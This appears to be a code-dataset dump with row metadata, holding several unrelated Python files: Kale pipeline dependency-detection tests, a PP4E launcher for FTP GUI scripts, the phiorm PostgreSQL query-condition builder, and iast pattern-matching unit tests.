                           source=_prepend_to_source(_source,
                                                     imports_and_functions)))

    _source = ['''
def foo(x):
    def bar():
        math.sqrt(x + y)
    bar()
''']
    pipeline.add_step(Step(name="step2",
                           source=_prepend_to_source(_source,
                                                     imports_and_functions)))

    _source = ["foo(5)"]
    pipeline.add_step(Step(name="step3",
                           source=_prepend_to_source(_source,
                                                     imports_and_functions)))

    pipeline.add_edge("step1", "step2")
    pipeline.add_edge("step2", "step3")

    dependencies.dependencies_detection(pipeline, imports_and_functions)
    # y is resolved as a pipeline parameter (not a step-to-step data dep):
    # it appears in .parameters of the consuming steps, not in ins/outs.
    assert sorted(pipeline.get_step("step1").ins) == []
    assert sorted(pipeline.get_step("step1").outs) == []
    assert sorted(pipeline.get_step("step2").ins) == []
    assert sorted(pipeline.get_step("step2").outs) == ['foo']
    assert pipeline.get_step("step2").parameters == {"y": (5, 'int')}
    assert sorted(pipeline.get_step("step3").ins) == ['foo']
    assert sorted(pipeline.get_step("step3").outs) == []
    assert pipeline.get_step("step3").parameters == {"y": (5, 'int')}


def test_dependencies_detection_with_try_except(dummy_nb_config):
    """Test dependencies are detected with functions inside try."""
    pipeline = Pipeline(dummy_nb_config)

    _source = ['''
x = 5
y = 6
''']
    pipeline.add_step(Step(name="step1", source=_source))

    _source = ['''
try:
    def foo():
        print(x)

    def bar():
        print(y)
except:
    pass
''']
    pipeline.add_step(Step(name="step2", source=_source))

    _source = ['''
foo()
bar()
''']
    pipeline.add_step(Step(name="step3", source=_source))

    pipeline.add_edge("step1", "step2")
    pipeline.add_edge("step2", "step3")

    dependencies.dependencies_detection(pipeline)
    # Definitions nested inside try/except must still be detected, together
    # with their free variables x and y.
    assert sorted(pipeline.get_step("step1").ins) == []
    assert sorted(pipeline.get_step("step1").outs) == ['x', 'y']
    assert sorted(pipeline.get_step("step2").ins) == ['x', 'y']
    assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x', 'y']
    assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x', 'y']
    assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_recursive(dummy_nb_config):
    """Test dependencies are detected even with a chain of functions calls."""
    pipeline = Pipeline(dummy_nb_config)

    _source = ["x = 5"]
    pipeline.add_step(Step(name="step1", source=_source))

    _source = ['''
def foo():
    print(x)

def bar():
    foo()
''']
    pipeline.add_step(Step(name="step2", source=_source))

    _source = ["bar()"]
    pipeline.add_step(Step(name="step3", source=_source))

    pipeline.add_edge("step1", "step2")
    pipeline.add_edge("step2", "step3")

    dependencies.dependencies_detection(pipeline)
    # bar -> foo -> x: calling bar transitively requires foo and x.
    assert sorted(pipeline.get_step("step1").ins) == []
    assert sorted(pipeline.get_step("step1").outs) == ['x']
    assert sorted(pipeline.get_step("step2").ins) == ['x']
    assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x']
    assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x']
    assert sorted(pipeline.get_step("step3").outs) == []


def test_dependencies_detection_recursive_different_steps(dummy_nb_config):
    """Test dependencies are detected even with a chain of functions calls."""
    # Same chain as above, but foo and bar are defined in different steps.
    pipeline = Pipeline(dummy_nb_config)

    _source = ['''
x = 5

def foo():
    print(x)
''']
    pipeline.add_step(Step(name="step1", source=_source))

    _source = ['''
def bar():
    foo()
''']
    pipeline.add_step(Step(name="step2", source=_source))

    _source = ["bar()"]
    pipeline.add_step(Step(name="step3", source=_source))

    pipeline.add_edge("step1", "step2")
    pipeline.add_edge("step2", "step3")

    dependencies.dependencies_detection(pipeline)
    assert sorted(pipeline.get_step("step1").ins) == []
    assert sorted(pipeline.get_step("step1").outs) == ['foo', 'x']
    assert sorted(pipeline.get_step("step2").ins) == ['foo', 'x']
    assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x']
    assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x']
    assert sorted(pipeline.get_step("step3").outs) == []


def test_deps_detection_recursive_different_steps_long(dummy_nb_config):
    """Test dependencies are detected even with a long chain of fns calls."""
    # bar -> foo -> init -> x, spread over four steps.
    pipeline = Pipeline(dummy_nb_config)

    _source = ['''
x = 5

def init():
    print(x)
''']
    pipeline.add_step(Step(name="step0", source=_source))

    _source = ['''
def foo():
    init()
''']
    pipeline.add_step(Step(name="step1", source=_source))

    _source = ['''
def bar():
    foo()
''']
    pipeline.add_step(Step(name="step2", source=_source))

    _source = ["bar()"]
    pipeline.add_step(Step(name="step3", source=_source))

    pipeline.add_edge("step0", "step1")
    pipeline.add_edge("step1", "step2")
    pipeline.add_edge("step2", "step3")

    dependencies.dependencies_detection(pipeline)
    # Every link of the chain must be carried forward at each hop.
    assert sorted(pipeline.get_step("step0").ins) == []
    assert sorted(pipeline.get_step("step0").outs) == ['init', 'x']
    assert sorted(pipeline.get_step("step1").ins) == ['init', 'x']
    assert sorted(pipeline.get_step("step1").outs) == ['foo', 'init', 'x']
    assert sorted(pipeline.get_step("step2").ins) == ['foo', 'init', 'x']
    assert (sorted(pipeline.get_step("step2").outs)
            == ['bar', 'foo', 'init', 'x'])
    assert (sorted(pipeline.get_step("step3").ins)
            == ['bar', 'foo', 'init', 'x'])
    assert sorted(pipeline.get_step("step3").outs) == []


def test_deps_detection_recursive_different_steps_branch(dummy_nb_config):
    """Test dependencies when fns are passed from multiple branches."""
    # Diamond: step0 fans out to step_l/step_r; step_m merges both branches'
    # functions inside result(); step_f calls it.
    pipeline = Pipeline(dummy_nb_config)

    _source = ['''
x = 5
y = 6
''']
    pipeline.add_step(Step(name="step0", source=_source))

    _source = ['''
def foo():
    print(x)
''']
    pipeline.add_step(Step(name="step_l", source=_source))

    _source = ['''
def bar():
    print(y)
''']
    pipeline.add_step(Step(name="step_r", source=_source))

    _source = ['''
def result():
    foo()
    bar()
''']
    pipeline.add_step(Step(name="step_m", source=_source))

    _source = ["result()"]
    pipeline.add_step(Step(name="step_f", source=_source))

    pipeline.add_edge("step0", "step_l")
    pipeline.add_edge("step0", "step_r")
    pipeline.add_edge("step_l", "step_m")
    pipeline.add_edge("step_r", "step_m")
    pipeline.add_edge("step_m", "step_f")

    dependencies.dependencies_detection(pipeline)
    # Each branch only needs its own variable; the merge point needs both.
    assert sorted(pipeline.get_step("step0").ins) == []
    assert sorted(pipeline.get_step("step0").outs) == ['x', 'y']
    assert sorted(pipeline.get_step("step_l").ins) == ['x']
    assert sorted(pipeline.get_step("step_l").outs) == ['foo', 'x']
    assert sorted(pipeline.get_step("step_r").ins) == ['y']
    assert sorted(pipeline.get_step("step_r").outs) == ['bar', 'y']
    assert sorted(pipeline.get_step("step_m").ins) == ['bar', 'foo', 'x', 'y']
    assert (sorted(pipeline.get_step("step_m").outs)
            == ['bar', 'foo', 'result', 'x', 'y'])
    assert (sorted(pipeline.get_step("step_f").ins)
            == ['bar', 'foo', 'result', 'x', 'y'])
    assert sorted(pipeline.get_step("step_f").outs) == []
| 33.392777 | 78 | 0.633137 | # Copyright 2020 The Kale Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from kale import Pipeline, Step
from kale.static_analysis import dependencies
@pytest.mark.parametrize("code,target", [
('', []),
('a = b', ['b']),
('a = foo(b)', ['foo', 'b']),
('a = b\nfoo(b)', ['b', 'foo']),
('foo(b)', ['foo', 'b'])
])
def test_pyflakes_report(code, target):
"""Tests pyflakes_report function."""
res = dependencies.pyflakes_report(code)
assert sorted(res) == sorted(target)
def test_detect_fns_free_variables():
"""Test the function returns the correct free variables."""
source_code = '''
x = 5
def foo():
print(math.sqrt(x))
'''
target = {"foo": ({"x", "math"}, {})}
assert target == dependencies.detect_fns_free_variables(source_code)
def test_detect_fns_free_variables_with_imports():
"""Test the function returns the correct free variables."""
imports_and_functions = """
import math
"""
source_code = '''
x = 5
def foo():
print(math.sqrt(x))
'''
target = {"foo": ({"x"}, {})}
assert target == dependencies.detect_fns_free_variables(
source_code,
imports_and_functions
)
def _prepend_to_source(source, prefix):
return [prefix + "\n" + "\n".join(source)]
def test_dependencies_detection_free_variable(dummy_nb_config):
"""Test dependencies detection with free variables."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
print(x)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ['''
foo()
''']
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ["x"]
assert sorted(pipeline.get_step("step2").ins) == ["x"]
assert sorted(pipeline.get_step("step2").outs) == ["foo", "x"]
assert sorted(pipeline.get_step("step3").ins) == ["foo", "x"]
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_inner_function(dummy_nb_config):
"""Test dependencies detection with inner functions."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
def bar(x):
print(x)
bar(5)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ['''
foo()
print(x)
''']
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x']
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert sorted(pipeline.get_step("step3").ins) == ['foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_inner_function_free_variable(dummy_nb_config):
"""Test dependencies detection with free variables and inner function."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
def bar():
print(x)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["foo()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x']
assert sorted(pipeline.get_step("step2").ins) == ['x']
assert sorted(pipeline.get_step("step2").outs) == ['foo', 'x']
assert sorted(pipeline.get_step("step3").ins) == ['foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_with_parameter(dummy_nb_config):
"""Test dependencies detection with function with parameter."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo(x):
def bar():
print(x)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["foo(5)"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == []
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert sorted(pipeline.get_step("step3").ins) == ['foo']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_with_globals(dummy_nb_config):
"""Test dependencies detection with inner function and globals."""
imports_and_functions = "import math"
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ['''
def foo(x):
def bar():
math.sqrt(x)
bar()
''']
pipeline.add_step(Step(name="step2",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ["foo(5)"]
pipeline.add_step(Step(name="step3",
source=_prepend_to_source(_source,
imports_and_functions)))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline, imports_and_functions)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == []
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert sorted(pipeline.get_step("step3").ins) == ['foo']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_with_pipeline_parameters(dummy_nb_config):
"""Test dependencies are detected with pipeline parameters and globals."""
imports_and_functions = "import math"
pipeline = Pipeline(dummy_nb_config)
pipeline.pipeline_parameters = {"y": (5, 'int')}
_source = ["x = 5"]
pipeline.add_step(Step(name="step1",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ['''
def foo(x):
def bar():
math.sqrt(x + y)
bar()
''']
pipeline.add_step(Step(name="step2",
source=_prepend_to_source(_source,
imports_and_functions)))
_source = ["foo(5)"]
pipeline.add_step(Step(name="step3",
source=_prepend_to_source(_source,
imports_and_functions)))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline, imports_and_functions)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == []
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert pipeline.get_step("step2").parameters == {"y": (5, 'int')}
assert sorted(pipeline.get_step("step3").ins) == ['foo']
assert sorted(pipeline.get_step("step3").outs) == []
assert pipeline.get_step("step3").parameters == {"y": (5, 'int')}
def test_dependencies_detection_with_try_except(dummy_nb_config):
"""Test dependencies are detected with functions inside try."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
y = 6
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
try:
def foo():
print(x)
def bar():
print(y)
except:
pass
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ['''
foo()
bar()
''']
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x', 'y']
assert sorted(pipeline.get_step("step2").ins) == ['x', 'y']
assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x', 'y']
assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x', 'y']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_recursive(dummy_nb_config):
"""Test dependencies are detected even with a chain of functions calls."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
print(x)
def bar():
foo()
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["bar()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x']
assert sorted(pipeline.get_step("step2").ins) == ['x']
assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_recursive_different_steps(dummy_nb_config):
"""Test dependencies are detected even with a chain of functions calls."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
def foo():
print(x)
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def bar():
foo()
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["bar()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['foo', 'x']
assert sorted(pipeline.get_step("step2").ins) == ['foo', 'x']
assert sorted(pipeline.get_step("step2").outs) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").ins) == ['bar', 'foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_deps_detection_recursive_different_steps_long(dummy_nb_config):
"""Test dependencies are detected even with a long chain of fns calls."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
def init():
print(x)
''']
pipeline.add_step(Step(name="step0", source=_source))
_source = ['''
def foo():
init()
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def bar():
foo()
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["bar()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step0", "step1")
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step0").ins) == []
assert sorted(pipeline.get_step("step0").outs) == ['init', 'x']
assert sorted(pipeline.get_step("step1").ins) == ['init', 'x']
assert sorted(pipeline.get_step("step1").outs) == ['foo', 'init', 'x']
assert sorted(pipeline.get_step("step2").ins) == ['foo', 'init', 'x']
assert (sorted(pipeline.get_step("step2").outs)
== ['bar', 'foo', 'init', 'x'])
assert (sorted(pipeline.get_step("step3").ins)
== ['bar', 'foo', 'init', 'x'])
assert sorted(pipeline.get_step("step3").outs) == []
def test_deps_detection_recursive_different_steps_branch(dummy_nb_config):
"""Test dependencies when fns are passed from multiple branches."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
y = 6
''']
pipeline.add_step(Step(name="step0", source=_source))
_source = ['''
def foo():
print(x)
''']
pipeline.add_step(Step(name="step_l", source=_source))
_source = ['''
def bar():
print(y)
''']
pipeline.add_step(Step(name="step_r", source=_source))
_source = ['''
def result():
foo()
bar()
''']
pipeline.add_step(Step(name="step_m", source=_source))
_source = ["result()"]
pipeline.add_step(Step(name="step_f", source=_source))
pipeline.add_edge("step0", "step_l")
pipeline.add_edge("step0", "step_r")
pipeline.add_edge("step_l", "step_m")
pipeline.add_edge("step_r", "step_m")
pipeline.add_edge("step_m", "step_f")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step0").ins) == []
assert sorted(pipeline.get_step("step0").outs) == ['x', 'y']
assert sorted(pipeline.get_step("step_l").ins) == ['x']
assert sorted(pipeline.get_step("step_l").outs) == ['foo', 'x']
assert sorted(pipeline.get_step("step_r").ins) == ['y']
assert sorted(pipeline.get_step("step_r").outs) == ['bar', 'y']
assert sorted(pipeline.get_step("step_m").ins) == ['bar', 'foo', 'x', 'y']
assert (sorted(pipeline.get_step("step_m").outs)
== ['bar', 'foo', 'result', 'x', 'y'])
assert (sorted(pipeline.get_step("step_f").ins)
== ['bar', 'foo', 'result', 'x', 'y'])
assert sorted(pipeline.get_step("step_f").outs) == []
| 65 | 0 | 23 |
78c473c35f8000f0305c9c536f9c751eafaa1176 | 960 | pyw | Python | PP4E/Examples/PP4E/Internet/Ftp/PyFtpGui.pyw | BeacherHou/Python-_Markdown- | 015d79a02d32f49395b80ca10919b3a09b72c4df | [
"MIT"
] | null | null | null | PP4E/Examples/PP4E/Internet/Ftp/PyFtpGui.pyw | BeacherHou/Python-_Markdown- | 015d79a02d32f49395b80ca10919b3a09b72c4df | [
"MIT"
] | null | null | null | PP4E/Examples/PP4E/Internet/Ftp/PyFtpGui.pyw | BeacherHou/Python-_Markdown- | 015d79a02d32f49395b80ca10919b3a09b72c4df | [
"MIT"
] | null | null | null | """
spawn FTP get and put GUIs no matter what directory I'm run from; os.getcwd is not
necessarily the place this script lives; could also hardcode path from $PP4EHOME,
or guessLocation; could also do: [from PP4E.launchmodes import PortableLauncher,
PortableLauncher('getfilegui', '%s/getfilegui.py' % mydir)()], but need the DOS
console pop up on Windows to view status messages which describe transfers made;
"""
import os, sys
print('Running in: ', os.getcwd())
# PP3E
# from PP4E.Launcher import findFirst
# mydir = os.path.split(findFirst(os.curdir, 'PyFtpGui.pyw'))[0]
# PP4E
from PP4E.Tools.find import findlist
# Locate the directory this script lives in so the two GUI scripts
# (getfilegui.py / putfilegui.py) can be launched from there.
mydir = os.path.dirname(findlist('PyFtpGui.pyw', startdir=os.curdir)[0])
if sys.platform[:3] == 'win':
    # Raw strings: '\g' and '\p' are invalid escape sequences in normal
    # string literals (DeprecationWarning since Python 3.6); the runtime
    # command text is byte-identical.
    os.system(r'start %s\getfilegui.py' % mydir)
    os.system(r'start %s\putfilegui.py' % mydir)
else:
    # '&' backgrounds each GUI process on Unix-like platforms.
    os.system('python %s/getfilegui.py &' % mydir)
    os.system('python %s/putfilegui.py &' % mydir)
| 36.923077 | 84 | 0.698958 | """
spawn FTP get and put GUIs no matter what directory I'm run from; os.getcwd is not
necessarily the place this script lives; could also hardcode path from $PP4EHOME,
or guessLocation; could also do: [from PP4E.launchmodes import PortableLauncher,
PortableLauncher('getfilegui', '%s/getfilegui.py' % mydir)()], but need the DOS
console pop up on Windows to view status messages which describe transfers made;
"""
import os, sys
print('Running in: ', os.getcwd())
# PP3E
# from PP4E.Launcher import findFirst
# mydir = os.path.split(findFirst(os.curdir, 'PyFtpGui.pyw'))[0]
# PP4E
from PP4E.Tools.find import findlist
# Locate the directory this script lives in so the two GUI scripts
# (getfilegui.py / putfilegui.py) can be launched from there.
mydir = os.path.dirname(findlist('PyFtpGui.pyw', startdir=os.curdir)[0])
if sys.platform[:3] == 'win':
    # Raw strings: '\g' and '\p' are invalid escape sequences in normal
    # string literals (DeprecationWarning since Python 3.6); the runtime
    # command text is byte-identical.
    os.system(r'start %s\getfilegui.py' % mydir)
    os.system(r'start %s\putfilegui.py' % mydir)
else:
    # '&' backgrounds each GUI process on Unix-like platforms.
    os.system('python %s/getfilegui.py &' % mydir)
    os.system('python %s/putfilegui.py &' % mydir)
| 0 | 0 | 0 |
a25b9d90eeaa5ac8fc3c41ceddd288d6914af2ae | 2,290 | py | Python | phiorm/models/query/psqlQ.py | rahungria/phiorm | 8990b5001c9b7c5f5de69a86d2d4314ab62b8bbd | [
"MIT"
] | null | null | null | phiorm/models/query/psqlQ.py | rahungria/phiorm | 8990b5001c9b7c5f5de69a86d2d4314ab62b8bbd | [
"MIT"
] | null | null | null | phiorm/models/query/psqlQ.py | rahungria/phiorm | 8990b5001c9b7c5f5de69a86d2d4314ab62b8bbd | [
"MIT"
] | null | null | null | from phiorm.models.query import query
from phiorm.util import tree
| 30.533333 | 76 | 0.526201 | from phiorm.models.query import query
from phiorm.util import tree
class psqlQ(query.Q):
    """PostgreSQL condition builder: a binary tree of SQL fragments using
    pyformat ('%(name)s') placeholders.

    Leaves hold a single comparison such as 'col=%(col)s' (or
    'col IS %(col)s' for None values); inner nodes hold 'AND' / 'OR'.
    Instances compose with the &, | and ~ operators.  `evaluate()` joins
    the fragments of the tree into one SQL string and `kwargs()` collects
    the placeholder values.

    NOTE(review): `inorder()` is inherited from the tree base structure —
    presumably an in-order traversal; confirm in phiorm.util.tree.
    """
    def __init__(
        self,
        query:str=None,
        left:'tree'=None, right:'tree'=None,
        **kwargs
    ):
        """Build a leaf from the first keyword argument, or an inner node
        when an explicit `query` string is given.  Any remaining keyword
        arguments are folded into this node with AND.
        """
        self.query = query
        self._kwargs = {}
        self.negative = False
        self.left = left
        self.right = right
        if not self.query:
            # build this object from the first kwarg
            for k in kwargs:
                self._kwargs = {str(k): kwargs.pop(k)}
                self.build_query(**{str(k): self._kwargs[k]})
                break
            # build all children Q from the rest (defaults to AND)
            for k in kwargs:
                new_self = type(self)(**self._kwargs)&type(self)(**kwargs)
                self.copy_constructor(new_self)
                break
        super().__init__(
            data=self, left=self.left, right=self.right, **self._kwargs
        )
    def build_query(self, **kwargs):
        """Set self.query to a single comparison fragment for the one
        given keyword; None compares with IS so it matches SQL NULL."""
        assert len(kwargs) == 1
        for k in kwargs:
            if kwargs[k] is None:
                self.query = f"{k} IS %({k})s"
            else:
                self.query = f"{k}=%({k})s"
    def copy_constructor(self, new: 'psqlQ'):
        """Overwrite this node's state with another instance's state
        (used by __init__ to rebuild self after AND-folding extra kwargs)."""
        self.query = new.query
        self._kwargs = new._kwargs
        self.negative = new.negative
        self.left = new.left
        self.right = new.right
        self.data = new.data
    def __invert__(self) -> 'psqlQ':
        """Return a negated copy of this node.

        Negation is purely textual: '=' <-> '!=' and 'IS' <-> 'IS NOT'
        are swapped in the fragment, with `negative` tracking direction
        so double inversion round-trips.
        """
        inv = type(self)(query=self.query, left=self.left, right=self.right)
        inv.negative = self.negative
        if not inv.negative:
            inv.query = inv.query.replace('=', '!=').replace('IS', 'IS NOT')
        else:
            inv.query = inv.query.replace('!=', '=').replace('IS NOT', 'IS')
        inv.negative = not inv.negative
        return inv
    def __and__(self, other: 'psqlQ') -> 'psqlQ':
        """Combine two conditions under an 'AND' parent node."""
        q = type(self)(query="AND", left=self, right=other)
        return q
    def __or__(self, other: 'psqlQ') -> 'psqlQ':
        """Combine two conditions under an 'OR' parent node."""
        q = type(self)(query="OR", left=self, right=other)
        return q
    def evaluate(self):
        """Join all fragments of the tree (in-order) into one SQL string."""
        return ' '.join(q.query for q in self.inorder())
    def kwargs(self):
        """Collect the placeholder-name -> value mapping for the whole tree."""
        d = {}
        for q in self.inorder():
            d.update(q._kwargs)
        return d
| 1,983 | 0 | 238 |
31119da69ba8230efe29da46c6c47252618f2da5 | 3,754 | py | Python | tests/test_pattern.py | brandjon/iast | 23961536c3bfb5d8fce39c28214ea88b8072450c | [
"PSF-2.0"
] | 11 | 2015-01-04T08:40:09.000Z | 2021-03-24T03:56:34.000Z | tests/test_pattern.py | brandjon/iast | 23961536c3bfb5d8fce39c28214ea88b8072450c | [
"PSF-2.0"
] | null | null | null | tests/test_pattern.py | brandjon/iast | 23961536c3bfb5d8fce39c28214ea88b8072450c | [
"PSF-2.0"
] | null | null | null | """Unit tests for pattern.py."""
import unittest
from iast.python.default import parse, make_pattern, Num, BinOp, Add, Mult
from iast.pattern import *
from iast.pattern import match_step
if __name__ == '__main__':
unittest.main()
| 33.81982 | 74 | 0.515184 | """Unit tests for pattern.py."""
import unittest
from iast.python.default import parse, make_pattern, Num, BinOp, Add, Mult
from iast.pattern import *
from iast.pattern import match_step
class PatternCase(unittest.TestCase):
    """Unit tests for iast.pattern: single-step unification (match_step),
    full matching (match) and rule-based rewriting (PatternTransformer)."""
    def pat(self, source):
        """Parse source and convert the tree to a pattern (PatVar/Wildcard)."""
        return make_pattern(parse(source))
    def pe(self, source):
        """Parse source and return the first expression's value node."""
        return parse(source).body[0].value
    def pate(self, source):
        """Like pe(), but on the pattern-converted tree."""
        return self.pat(source).body[0].value
    def test_match_step(self):
        # Simple.
        result = match_step(PatVar('_X'), Num(1))
        exp_result = ([], {'_X': Num(1)})
        self.assertEqual(result, exp_result)
        # Wildcard.
        result = match_step(Wildcard(), Num(1))
        exp_result = ([], {})
        self.assertEqual(result, exp_result)
        # Var on RHS.
        result = match_step(Num(1), PatVar('_X'))
        exp_result = ([], {'_X': Num(1)})
        self.assertEqual(result, exp_result)
        # Redundant equation.
        result = match_step(PatVar('_X'), PatVar('_X'))
        exp_result = ([], {})
        self.assertEqual(result, exp_result)
        # Circular equation.
        with self.assertRaises(MatchFailure):
            match_step(PatVar('_X'), BinOp(PatVar('_X'), Add(), Num(1)))
        # Nodes, constants.
        result = match_step(Num(1), Num(1))
        exp_result = ([(1, 1)], {})
        self.assertEqual(result, exp_result)
        with self.assertRaises(MatchFailure):
            match_step(Num(1), BinOp(Num(1), Add(), Num(2)))
        with self.assertRaises(MatchFailure):
            match_step(1, 2)
        # Tuples.
        result = match_step((1, 2), (1, 2))
        exp_result = ([(1, 1), (2, 2)], {})
        self.assertEqual(result, exp_result)
        with self.assertRaises(MatchFailure):
            match_step((1, 2), (1, 2, 3))
    def test_match(self):
        # Nested tuples and binops unify; '_' is a wildcard, _Z binds once.
        result = match(self.pat('((_X, _Y), _Z + _)'),
                       self.pat('((1, _Z), 2 + 3)'))
        exp_result = {
            '_X': Num(1),
            '_Y': Num(2),
            '_Z': Num(2),
        }
        self.assertEqual(result, exp_result)
        # Non-matching values yield None rather than raising.
        result = match(1, 2)
        self.assertEqual(result, None)
    def test_pattrans(self):
        class Trans(PatternTransformer):
            rules = [
                # Constant-fold addition.
                (BinOp(Num(PatVar('_X')), Add(), Num(PatVar('_Y'))),
                 lambda _X, _Y: Num(_X + _Y)),
                # Constant-fold left-multiplication by 0,
                # defer to other rules.
                (BinOp(Num(PatVar('_X')), Mult(), Num(PatVar('_Y'))),
                 lambda _X, _Y: Num(0) if _X == 0 else NotImplemented),
                # Constant-fold right-multiplication by 0,
                # do not defer to other rules.
                (BinOp(Num(PatVar('_X')), Mult(), Num(PatVar('_Y'))),
                 lambda _X, _Y: Num(0) if _Y == 0 else None),
                # Constant-fold multiplication, but never gets
                # to run since above rule doesn't defer.
                (BinOp(Num(PatVar('_X')), Mult(), Num(PatVar('_Y'))),
                 lambda _X, _Y: Num(_X * _Y)),
            ]
        # Bottom-up; subtrees should be processed first.
        tree = parse('1 + (2 + 3)')
        tree = Trans.run(tree)
        exp_tree = parse('6')
        self.assertEqual(tree, exp_tree)
        # NotImplemented defers to third rule, None blocks last rule.
        tree = parse('(5 * 2) * ((3 * 0) - 1)')
        tree = Trans.run(tree)
        exp_tree = parse('(5 * 2) * (0 - 1)')
        self.assertEqual(tree, exp_tree)
if __name__ == '__main__':
unittest.main()
| 3,289 | 16 | 209 |
